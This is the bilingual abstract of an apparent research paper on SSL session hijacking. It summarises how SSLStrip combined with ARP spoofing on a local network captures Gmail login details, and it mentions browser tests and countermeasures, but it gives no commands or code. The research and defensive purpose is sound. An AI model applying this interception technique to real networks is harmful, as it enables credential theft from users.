中文摘要：

安全套接层SSL协议是实现互联网通信安全的关键协议,一般用于传输敏感数据,由于对信息进行加密和认证,因此安全性很高。SSL攻击一般是通过中间人攻击伪造X.509证书,但浏览器会弹出警告框,最近一种更具隐蔽性的SSL会话劫持方式避免了这问题。介绍了该攻击方式的原理,并演示在局域网环境中利用SSLStrip工具结合ARP欺骗获取Gmail用户信息的方法,并对Firefox和Chrome进行了安全测试,指出了通过浏览器进行SSL会话的安全隐患,最后提供了相关的防范措施.

英文摘要：

SSL protocol,a key protocol in achieving Internet communication security,is generally used for transmission of sensitive data. It is of high security for its encryption and authentication of the sensitive data. The usual method for SSL attack is to forge X.509 certificates based on Man-in-the-Middle,however there are usually warning indicators in the browser. Recently,a hidden and better method for SSL attack could avoid this warning. The paper describes the principle of SSL attack,the demonstration of SSLStrip in acquiring the password of Gmail in the LAN environment. Meanwhile the safety tests on Firefox and Chrome are done,and finally some preventive measures against SSL attack are also provided.